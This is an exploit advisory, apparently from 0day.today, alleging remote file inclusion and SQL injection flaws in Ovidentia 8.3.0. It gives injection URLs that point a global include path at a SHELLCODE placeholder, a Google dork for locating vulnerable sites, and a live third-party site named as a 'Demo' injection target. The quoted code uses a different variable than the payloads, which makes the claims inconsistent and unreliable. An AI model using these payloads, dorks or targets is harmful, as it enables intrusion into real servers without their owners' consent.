Ovidentia 8.3.0 Remote File Inclusion / SQL injection Vulnerabilities

# Title: Ovidentia 8.3.0 Remote File Inclusion / SQL injection Vulnerabilities
# Author: GoLd_M
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-3-0.zip&idf=886
  
Remote File Inclusion PoCs :
  
\ovidentia-8-3-0\ovidentia\utilit\ocapi.php
Line 25: include_once $GLOBALS['babInstallPath'].'utilit/treeincl.php';
----------------------------------------------
\ovidentia-8-3-0\ovidentia\utilit\orgchart.php
include_once $GLOBALS['babInstallPath'].'utilit/tree.php';
----------------------------------------------
\ovidentia-8-3-0\ovidentia\utilit\ovmlapi.php
include_once $GLOBALS['babInstallPath'].'utilit/omlincl.php';
.......... 
----------------------------------------------

http://[s0me0ne/ovidentia-8-3-0/ovidentia/utilit/ocapi.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
http://[s0me0ne/ovidentia-8-3-0/ovidentia/utilit/orgchart.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
http://[s0me0ne/ovidentia-8-3-0/ovidentia/utilit/ovmlapi.php?GLOBALS[babAddonPhpPath]=SHELLCODE?

SQL injection

# Google : Powered by Ovidentia "index.php?tg=topusr"
# Demo 
# http://www.washingtonnetworkgroup.com/index.php?tg=topusr&cat=3'
# Pic : http://www.mrkzgulf.com/uploads/1450257338821.png

#  0day.today [2018-03-20]  #